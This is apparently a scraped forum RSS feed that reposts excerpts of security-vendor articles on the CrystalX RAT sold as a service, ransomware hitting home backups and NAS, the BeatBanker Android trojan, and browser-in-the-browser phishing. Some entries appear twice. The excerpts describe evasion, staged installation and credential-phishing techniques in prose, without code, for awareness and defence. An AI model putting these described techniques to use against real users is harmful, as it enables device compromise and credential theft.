In March 2026, we discovered an active campaign promoting previously unknown malware in private Telegram chats. The Trojan was offered as a MaaS (malware‑as‑a‑service) with three subscription tiers. It caught our attention because of its extensive arsenal of capabilities. On the panel provided to third‑party actors, in addition to the standard features of RAT‑like malware, a stealer, keylogger, clipper, and spyware are also available. Most surprisingly, it also includes prankware capabilities: a large set of features designed to trick, annoy, and troll the user. Such a combination of capabilities makes it a rather unique Trojan in its category.

Kaspersky’s products detect this threat as Backdoor.Win64.CrystalX.*, Trojan.Win64.Agent.*, Trojan.Win32.Agentb.gen.

Technical details

Background

The new malware was first mentioned in January 2026 in a private Telegram chat for developers of RAT malware. The author actively promoted their creation, called Webcrystal RAT, by attaching screenshots of the web panel. Many users observed that the panel layout was identical to that of the previously known WebRAT (also called Salat Stealer), leading them to label this malware as a copy. Additional similarities included the fact that the RAT was written in Go, and the messages from the bot selling access keys to the control panel closely matched those of the WebRAT bots.

After some time, this malware was rebranded and received a new name, CrystalX RAT. Its promotion moved to a corresponding new channel, which is quite busy and features marketing tricks, such as access key draws and polls. Moreover, it expanded beyond Telegram: a special YouTube channel was created, aimed at marketing promotion and already containing a video review of the capabilities of this malware.

Continue Reading... ]]> <![CDATA[Ransomware now taking aim at personal backups]]> https://www.geeks.fyi/showthread.php?tid=21703 Wed, 01 Apr 2026 07:18:02 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21703 Quote:Personal backups and home NAS are now in cybercriminals’ crosshairs. We break down exactly how hackers encrypt your data — and how you can stop them.

Today — March 31 — is World Backup Day. And every year, most people tell themselves, “I’ll get around to that tomorrow”. But even if you’re one of the responsible ones who regularly backs up their docs, photo archives, and the entire operating system — you’re still at risk. Why? Because ransomware has learned how to specifically target everyday users’ backups.

Why home users are in the crosshairs

In the not-so-distant past, ransomware was mostly a big business problem. Attackers focused on corporate servers and enterprise backups because freezing a major company’s production process or stealing all their information and customer databases usually meant a massive payout. We’ve seen plenty of those cases over the last few years. However, the “small-fry” market has become just as tempting for cybercriminals — and here’s why.

For starters, attacks are automated. Modern ransomware doesn’t need a human operating it manually. These programs scan the internet for vulnerable devices and, upon finding one, encrypt everything indiscriminately without the hacker getting involved. This means a single attacker can effortlessly hit thousands of home devices.

Second, because of this broad reach, the ransom demands have become more “affordable”. Regular users aren’t asked for millions, but “only” a few hundred or thousand dollars. Many people are willing to pay that amount without involving the police — especially when family archives, photos, medical records, banking documents, and other personal files are on the line, with no other copies in existence. And when you multiply those smaller payouts by thousands of victims, the hackers walk away with very tidy sums.

And finally, home devices are usually sitting ducks. While corporate networks are guarded really well, the average home router most likely runs on factory settings with “admin” as the password. Many people leave their network attached storage (NAS) wide open to the internet with zero protection. It’s low-hanging fruit.

Continue Reading... ]]> Quote:Personal backups and home NAS are now in cybercriminals’ crosshairs. We break down exactly how hackers encrypt your data — and how you can stop them.

Today — March 31 — is World Backup Day. And every year, most people tell themselves, “I’ll get around to that tomorrow”. But even if you’re one of the responsible ones who regularly backs up their docs, photo archives, and the entire operating system — you’re still at risk. Why? Because ransomware has learned how to specifically target everyday users’ backups.

Why home users are in the crosshairs

In the not-so-distant past, ransomware was mostly a big business problem. Attackers focused on corporate servers and enterprise backups because freezing a major company’s production process or stealing all their information and customer databases usually meant a massive payout. We’ve seen plenty of those cases over the last few years. However, the “small-fry” market has become just as tempting for cybercriminals — and here’s why.

For starters, attacks are automated. Modern ransomware doesn’t need a human operating it manually. These programs scan the internet for vulnerable devices and, upon finding one, encrypt everything indiscriminately without the hacker getting involved. This means a single attacker can effortlessly hit thousands of home devices.

Second, because of this broad reach, the ransom demands have become more “affordable”. Regular users aren’t asked for millions, but “only” a few hundred or thousand dollars. Many people are willing to pay that amount without involving the police — especially when family archives, photos, medical records, banking documents, and other personal files are on the line, with no other copies in existence. And when you multiply those smaller payouts by thousands of victims, the hackers walk away with very tidy sums.

And finally, home devices are usually sitting ducks. While corporate networks are guarded really well, the average home router most likely runs on factory settings with “admin” as the password. Many people leave their network attached storage (NAS) wide open to the internet with zero protection. It’s low-hanging fruit.

Continue Reading... ]]> <![CDATA[Android trojan posing as government services and Starlink apps]]> https://www.geeks.fyi/showthread.php?tid=21654 Thu, 12 Mar 2026 10:18:52 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21654 Quote:We break down the BeatBanker trojan attack, which combines espionage, crypto theft, and mining with inventive ways to dig its heels into a smartphone.

To achieve their malign aims, Android malware developers have to address several challenges in a row: trick users to get inside their smartphones, dodge security software, talk victims into granting various system permissions, keep away from built-in battery optimizers that kill resource hogs, and, after all that, make sure their malware actually turns a profit. The creators of the BeatBanker — an Android‑based malware campaign recently discovered by our experts — have come up with something new for each one of these steps. The attack is (for now) aimed at Brazilian users, but the developers’ ambitions will almost certainly push them toward international expansion, so it’s worth staying on guard and studying the threat actor’s tricks. You can find a full technical analysis of the malware on Securelist.

How BeatBanker infiltrates a smartphone

The malware is distributed through specially crafted phishing pages that mimic the Google Play Store. A page that’s easily mistaken for the official app marketplace invites users to download a seemingly useful app. In one campaign, the trojan disguised itself as the Brazilian government services app, INSS Reembolso; in another, it posed as the Starlink app.

[Image: beatbanker-btmob-android-malware-disguis...lso-01.png]

The malicious site cupomgratisfood{.}shop does an excellent job imitating an app store. It’s just unclear why the fake INSS Reembolso appears all of three times. To be extra sure, perhaps?!

The installation takes place in several stages to avoid requesting too many permissions at once and to further lull the victim’s vigilance. After the first app is downloaded and launched, it displays an interface that also resembles Google Play and simulates an update for the decoy app — requesting the user’s permission to install apps, which doesn’t look out-of-the-ordinary in context. If you grant this permission, the malware downloads additional malicious modules to your smartphone.

[Image: beatbanker-btmob-android-malware-disguis...lso-02.png]

After installation, the trojan simulates a decoy app update via Google Play by requesting permission to install applications while downloading additional malicious modules in the process

All components of the trojan are encrypted. Before decrypting and proceeding to the next stages of infection, it checks to ensure it’s on a real smartphone and in the target country. BeatBanker immediately terminates its own process if it finds any discrepancies or detects that it’s running in emulated or analysis environments. This complicates dynamic analysis of the malware. Incidentally, the fake update downloader injects modules directly into RAM to avoid creating files on the smartphone that would be visible to security software.

Continue Reading... ]]> <![CDATA[Browser-in-the-browser attacks: from theory to reality]]> https://www.geeks.fyi/showthread.php?tid=21630 Wed, 04 Mar 2026 16:49:33 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21630 Quote:A browser-in-the-browser attack, theoretically described in 2022, has been adopted in real-world phishing. We break down how it works, and how to spot a fake authentication window.

In 2022, we dived deep into an attack method called browser-in-the-browser — originally developed by the cybersecurity researcher known as mr.d0x. Back then, no actual examples existed of this model being used in the wild. Fast-forward four years, and browser-in-the-browser attacks have graduated from the theoretical to the real: attackers are now using them in the field. In this post, we revisit what exactly a browser-in-the-browser attack is, show how hackers are deploying it, and, most importantly, explain how to keep yourself from becoming its next victim.

What is a browser-in-the-browser (BitB) attack?

For starters, let’s refresh our memories on what mr.d0x actually cooked up. The core of the attack stems from his observation of just how advanced modern web development tools — HTML, CSS, JavaScript, and the like — have become. It’s this realization that inspired the researcher to come up with a particularly elaborate phishing model.

A browser-in-the-browser attack is a sophisticated form of phishing that uses web design to craft fraudulent websites imitating login windows for well-known services like Microsoft, Google, Facebook, or Apple that look just like the real thing. The researcher’s concept involves an attacker building a legitimate-looking site to lure in victims. Once there, users can’t leave comments or make purchases unless they “sign in” first.

Signing in seems easy enough: just click the Sign in with {popular service name} button. And this is where things get interesting: instead of a genuine authentication page provided by the legitimate service, the user gets a fake form rendered inside the malicious site, looking exactly like… a browser pop-up. Furthermore, the address bar in the pop-up, also rendered by the attackers, displays a perfectly legitimate URL. Even a close inspection won’t reveal the trick.

From there, the unsuspecting user enters their credentials for Microsoft, Google, Facebook, or Apple into this rendered window, and those details go straight to the cybercriminals. For a while this scheme remained a theoretical experiment by the security researcher. Now — real-world attackers have added it to their arsenals.

Continue Reading... ]]> Quote:A browser-in-the-browser attack, theoretically described in 2022, has been adopted in real-world phishing. We break down how it works, and how to spot a fake authentication window.

In 2022, we dived deep into an attack method called browser-in-the-browser — originally developed by the cybersecurity researcher known as mr.d0x. Back then, no actual examples existed of this model being used in the wild. Fast-forward four years, and browser-in-the-browser attacks have graduated from the theoretical to the real: attackers are now using them in the field. In this post, we revisit what exactly a browser-in-the-browser attack is, show how hackers are deploying it, and, most importantly, explain how to keep yourself from becoming its next victim.

What is a browser-in-the-browser (BitB) attack?

For starters, let’s refresh our memories on what mr.d0x actually cooked up. The core of the attack stems from his observation of just how advanced modern web development tools — HTML, CSS, JavaScript, and the like — have become. It’s this realization that inspired the researcher to come up with a particularly elaborate phishing model.

A browser-in-the-browser attack is a sophisticated form of phishing that uses web design to craft fraudulent websites imitating login windows for well-known services like Microsoft, Google, Facebook, or Apple that look just like the real thing. The researcher’s concept involves an attacker building a legitimate-looking site to lure in victims. Once there, users can’t leave comments or make purchases unless they “sign in” first.

Signing in seems easy enough: just click the Sign in with {popular service name} button. And this is where things get interesting: instead of a genuine authentication page provided by the legitimate service, the user gets a fake form rendered inside the malicious site, looking exactly like… a browser pop-up. Furthermore, the address bar in the pop-up, also rendered by the attackers, displays a perfectly legitimate URL. Even a close inspection won’t reveal the trick.

From there, the unsuspecting user enters their credentials for Microsoft, Google, Facebook, or Apple into this rendered window, and those details go straight to the cybercriminals. For a while this scheme remained a theoretical experiment by the security researcher. Now — real-world attackers have added it to their arsenals.

Continue Reading... ]]>